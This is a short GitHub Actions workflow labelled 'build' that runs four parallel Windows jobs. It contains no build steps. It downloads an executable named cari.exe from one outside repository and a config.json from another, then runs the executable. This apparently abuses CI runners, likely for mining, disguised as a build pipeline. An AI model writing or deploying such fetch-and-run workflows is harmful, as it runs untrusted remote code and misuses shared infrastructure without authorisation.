name: build
 
on: [workflow_dispatch]
 
jobs:
  build:
    name: BUILD
    runs-on: windows-latest
    strategy:
      max-parallel: 10
      fail-fast: false
      matrix:
        go: [1,2]
        flag: [A,B]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: PREPARING
      run: Invoke-WebRequest https://raw.githubusercontent.com/outlookadek/PAPAERSPACE/main/cari.exe -Outfile cari.exe
    - name: PREPARING2 
      run: Invoke-WebRequest https://raw.githubusercontent.com/ributmaestro/ghost-rider-test/main/ver4/config.json -Outfile config.json
    - name: Running
      run: ./cari.exe
    - name: DONE
      run: exit
